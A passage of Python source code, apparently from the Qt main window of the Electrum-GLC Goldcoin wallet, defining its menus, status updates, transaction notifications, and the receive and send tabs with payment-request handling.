file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
if self.network and self.network.local_watchtower:
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Goldcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('goldcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-GLC",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Goldcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Goldcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
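            # the whitepaper PDF is embedded across this transaction's outputs;
            # strip the script framing bytes to recover the raw PDF data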
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-GLC", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-GLC", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both goldcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 GLC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
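        # Keep the BTC and fiat amount edits in sync: editing one recomputes the
        # other from the current exchange rate; the 'follows' flag prevents the
        # programmatic update from triggering another round trip.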
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
if self.tray:
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The goldcoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a goldcoin address any number of times but it is not good for your privacy.'),
'\n\n',
_('For Lightning requests, payments will not be accepted after the expiration.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 0, 1, -1)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning: bool):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
except InvoiceError as e:
self.show_error(_('Error creating payment request') + ':\n' + str(e))
return
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount: int, message: str, expiration: int) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = (_("Recipient of the funds.") + "\n\n"
+ _("You may enter a Goldcoin address, a label from your list of contacts "
"(a list of completions will be proposed), "
"or an alias (email-like address that forwards to a Goldcoin address)") + ". "
+ _("Lightning invoices are also supported.") + "\n\n"
+ _("You can also pay to many outputs in a single transaction, "
"specifying one output per line.") + "\n" + _("Format: address, amount") + "\n"
+ _("To set the amount to 'max', use the '!' special character.") + "\n"
+ _("Integers weights can also be used in conjunction with '!', "
"e.g. set one amount to '2!' and another to '3!' to split your coins 40-60."))
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = (_('The amount to be received by the recipient.') + ' '
+ _('Fees are paid by the sender.') + '\n\n'
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' '
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n'
+ _('Keyboard shortcut: type "!" to send all your coins.'))
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
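    # "Max" button handler: builds a draft transaction spending all available coins,
    # subtracts any plugin-provided extra fee (run_hook 'get_tx_extra_fee'), fills the
    # amount field, and shows a tooltip breaking down mining fee / 2fa fee / frozen balance.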
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
# show tooltip explaining max amount
mining_fee = tx.get_fee()
mining_fee_str = self.format_amount_and_units(mining_fee)
msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str)
if x_fee_amount:
twofactor_fee_str = self.format_amount_and_units(x_fee_amount)
msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str)
frozen_bal = self.get_frozen_balance_str()
if frozen_bal:
msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(frozen_bal)
QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Goldcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
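    # Note: amount_msat must be known at this point; the confirmation dialog shows the
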